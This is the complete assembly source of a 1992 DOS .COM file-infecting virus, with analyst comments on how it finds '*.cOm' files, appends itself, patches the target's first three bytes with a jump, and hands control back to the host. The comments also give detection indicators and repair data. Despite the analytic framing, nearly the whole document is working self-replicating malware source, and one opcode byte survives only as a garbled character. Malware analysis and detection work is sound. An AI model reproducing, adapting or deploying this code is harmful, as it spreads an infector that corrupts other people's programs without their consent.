; Analyst summary (derived from the listing in this file):
;   * Type: DOS .COM file infector. It appends its body to a target file and
;     overwrites the target's first three bytes with a jump to that body.
;   * It runs when an infected program starts, searches with the mask '*.cOm'
;     (no path, so presumably the current directory), infects at most one
;     file per run, then hands control back to the host at 0100h.
;   * No resident installation and no interrupt hooking appear in this listing.
;   * Observable effects: the target is opened read/write (int 21h, AX=3D02h),
;     grows by VirusEnd-VirusStart bytes, and no file date/time call
;     (int 21h, AH=57h) is made, so the modification time would be expected
;     to change.
;   * Repair data: the host's original first three bytes are stored in the
;     last three bytes of the appended body (label `original`), and the jump
;     displacement plus 3 equals the low 16 bits of the original file length.
;
; Original author's header, translated from Russian (the code-page encoding
; of the comments was garbled on this page):
;   A small (or large) virus that infects .COM programs
;   when they are run, if they do not have a JMP at the start.
;   Checks of any other kind are not present.
;
; Copyright (c) 1992, Gogi&Givi International.
;

        .model tiny
        .code
        org 0100h
start:
        jmp virusstart ; Jump to the viral code: the carrier program is laid out
                       ; the same way an infected host will be
        mov ah,09h ; DOS "print string"; DX is loaded by the three bytes that
        int 21h ; virusstart copies back over the jump above (see `original`)
        mov ax,4C00h ; DOS "terminate process", return code 0
        int 21h
Message db 'This is little infection... He-he...',13,10,'$'
; Up to this point: the ordinary code of the carrier ("victim") program.
virusstart: ; Start of the viral code (author: "and this is the virus")
; Register roles, as read from the code below:
;   SI = run-time address of SelfPoint; every data reference is formed as
;        SI + (label - SelfPoint), because the body runs at whatever offset
;        it was appended at.
;   DS = ES = CS for the string copy and the DOS calls.
; Behaviour worth noting for detection: a program that, at start-up, rewrites
; its own first three bytes at 0100h, installs a private DTA inside its own
; image and searches for '*.cOm'.
        pushf
        push ax ; Save the host's flags and registers
        push bx ; (author: "save everything we possibly can...")
        push cx
        push dx
        push ds ; Author's aside: "not sure how
        push es ; correct this is..."
        push si
        call SelfPoint
SelfPoint: ; The call pushed the address of SelfPoint;
        pop si ; popping it gives SI = where the code is actually running

        cld ; String operations move forward
        push cs ; Point the source and destination
        pop ds ; segment registers at the
        push cs ; code segment
        pop es
        mov di,0100h ; Destination: 0100h, the start of the program
        push si ; Keep SI (SelfPoint) across the copy
        add si,original-SelfPoint ; SI now points at the saved original bytes
        mov cx,3 ; three of them
        rep movsb ; Copy them back to the start of the
        pop si ; infected program, then recover SI

        mov ah,1Ah ; DOS "set DTA": use the private
        mov dx,si ; DTA that sits near the end of the
        add dx,VirusDTA-SelfPoint ; viral body (DS:DX = VirusDTA)
        int 21h

        mov ah,4Eh ; DOS FindFirst
        mov dx,si ; with the file mask at
        add dx,FileMask-SelfPoint ; FileMask
        mov cx,32 ; Attribute mask 32 (20h); the author calls it "read/write"
        int 21h ; and says it was chosen "to keep things simple"

        jnc RepeatOpen ; No error: go and open the file that was found

        jmp OutVirus ; Nothing found: leave and run the host
RepeatOpen:
; One infection attempt for the file named in the current find result.
; Sequence visible below: open read/write -> read first 3 bytes into the
; `original` slot -> skip the file if its first byte matches the jump marker
; -> seek to end -> write the body -> build a 3-byte jump in memory ->
; seek to start -> write the jump -> close -> exit.
; BX holds the DOS file handle throughout; SI still holds SelfPoint.
; Every error exit (jc OutVirus) goes straight to the host hand-over.
        mov ax,3D02h ; DOS open, access mode 02h (read/write)
        mov dx,si ; DS:DX = NameF, the 13 bytes placed right after the
        add dx,NameF-SelfPoint ; 30-byte VirusDTA; presumably the name field of the find result
        int 21h
        jc OutVirus ; Any error: leave

        mov bx,ax ; Take the file handle
                  ; and keep it in BX

        mov ah,3Fh ; DOS read: fetch the instructions that
        mov dx,si ; stand at the start of the target
        add dx,Original-SelfPoint ; into the `original` save slot
        mov cx,3 ; three bytes
        int 21h
        jc OutVirus ; Check for an error again
        push bx
        mov bx,dx ; BX = address of the bytes just read
        cmp byte ptr [bx],'é' ; Does this file also begin with a jump?
                              ; NOTE(review): the quoted character is shown as it survives
                              ; on this page; given the author's comment it presumably
                              ; stood for byte 0E9h (near JMP) in the original DOS
                              ; code page - confirm against the raw file.
        pop bx ; Restore the handle (pop does not change the flags from cmp)
        je CloseNotInfect ; Then do not infect it
                          ; (author: "too lazy to check more precisely").
                          ; This first-byte test is the only already-infected check,
                          ; so clean files that start with the same byte are skipped too.

        mov ax,4202h ; DOS seek, origin = end of file,
        xor cx,cx ; offset 0
        xor dx,dx
        int 21h ; On success AX holds the low word of the file length,
        jc OutVirus ; i.e. the offset at which the body will be appended
        push ax ; Keep that length across the write call

        mov ah,40h ; DOS write: append
        mov dx,si ; the viral body, starting at
        sub dx,SelfPoint-VirusStart ; the run-time address of VirusStart,
        mov cx,VirusEnd-VirusStart ; VirusEnd-VirusStart bytes
        int 21h

        pop ax ; Recover the file length (flags from the write are untouched)
        jc OutVirus ; A write error can happen -
                    ; a full disk, for example

        sub ax,3 ; Length minus 3 = displacement for a 3-byte jump at offset 0
        push bx ; Save the handle while BX is used as a pointer
        mov bx,si
        sub bx,SelfPoint-VirusStart ; BX = run-time address of VirusStart
        mov word ptr cs:[bx+1],ax ; Store the displacement after the opcode byte
        mov byte ptr [bx],'é' ; Jump opcode (within the segment); this overwrites the first
                              ; bytes of the in-memory body, which is already on disk by now
        pop bx

        mov ax,4200h ; DOS seek, origin = start of file,
        xor cx,cx ; offset 0
        xor dx,dx
        int 21h
        jc OutVirus ; Check for an error

        mov ah,40h ; DOS write: put the
        mov dx,si ; jump to the appended body
        sub dx,SelfPoint-VirusStart ; over the target's
        mov cx,3 ; first three bytes
        int 21h
        jc OutVirus ; Check for errors again

        mov ah,3Eh ; DOS close
        int 21h ; (the file is now infected -
        jmp OutVirus ; no further files are touched in this run)
CloseNotInfect:
; Reached when the candidate's first byte matched the jump marker: close it
; and move on to the next directory entry that matches the mask.
; BX = handle of the rejected file, SI = run-time address of SelfPoint.
        mov ah,3Eh ; DOS close on the unsuitable
        int 21h ; file

        mov dx,si
        add dx,FileMask-SelfPoint ; DX = FileMask, as for FindFirst
        mov ah,4Fh ; DOS FindNext (continues the search recorded in the DTA)
        int 21h
        jc OutVirus ; Error (no more matches): give up for this run
        jmp RepeatOpen ; Otherwise try to open the next candidate
OutVirus:
; Common exit path: undo the pushes made at virusstart (reverse order) and
; transfer control to the host, whose first three bytes at 0100h were
; restored at the top of virusstart.
        pop si ; Restore everything
        pop es ; that was saved
        pop ds ; on entry
        pop dx
        pop cx
        pop bx
        pop ax
        popf
        mov si,0100h ; Put the address of the program start
        push si ; on the stack (SI is left holding 0100h)
        ret ; and "return" to it, which starts the host

; Data area of the appended code follows (author: "our data").
VirusDTA db 30 dup (0) ; Private DTA installed with int 21h AH=1Ah (first 30 bytes)
NameF db 13 dup (0) ; The found file's name ends up here; with VirusDTA this
                    ; makes 43 contiguous bytes for the find result
FileMask db '*.cOm',(0) ; ASCIIZ search mask (author: "such a pretty mask");
                        ; the mixed-case string is a usable static indicator
original:
        mov dx,offset Message ; Save slot for the host's original first three bytes.
                              ; In this carrier it holds the instruction that the
                              ; stub at `start` needs; in an infected file it holds
                              ; the three bytes read from that file.
VirusEnd: ; End of the body written to targets, so `original` is its last
          ; three bytes. Author's aside: "(Lozinsky, don't doze off!)"
        end start